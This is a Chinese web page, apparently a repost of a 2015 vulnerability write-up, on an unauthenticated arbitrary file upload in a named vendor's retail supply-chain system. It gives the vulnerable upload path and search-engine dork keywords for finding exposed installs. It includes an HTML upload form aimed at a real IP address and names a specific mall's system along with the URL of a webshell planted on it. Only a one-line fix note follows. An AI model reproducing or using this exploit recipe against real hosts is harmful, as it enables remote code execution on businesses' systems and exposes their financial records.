网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

某商业链系统通用任意文件上传漏洞,直接Getshe

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] 涉及全国多家超市、商场,系统涉及的都是每天的流水账。 技术支持:北京富基融通科技有限公司(http: www e-future com cn )程序名称:商业供应链系统漏洞类型:任意文件上传导致代码执行...

涉及全国多家超市、商场,系统涉及的都是每天的流水账。 技术支持:北京富基融通科技有限公司(http://www.e-future.com.cn/)


程序名称:商业供应链系统

漏洞类型:任意文件上传导致代码执行

是否需要登录:否



漏洞文件:/web/epublic/upload.jsp



漏洞参数:File1



关键字:google & baidu intitle:商业供应链系统



影响用户:

可以参看开发公司的案例介绍:

http://www.e-future.com.cn/case_market.php
 

利用方式:

本地构造表单上传,代码如下:
 

<!DOCTYPE HTML>

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<title>UploadiFive Test</title>
</head>



<body>

<form enctype="multipart/form-data" action="http://123.127.107.117/web/epublic/upload.jsp" method="post">

<input type="file" name="Filedata" size="50"><br>

<input type="submit" value="Upload">

</form>

</body>

</html>





提交后报错,不管它,直接访问/web/upload/xxx.jsp (xxx.jsp为上传的文件名)


实例演示:



####1:

北京奥特莱斯SCM商业供应链系统

http://123.127.107.117/web/epublic/upload.jsp



shell地址:http://123.127.107.117/web/upload/silicwebshell.jsp
 

1.jpg

修复方案:

权限限制访问,上传文件限定类型

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论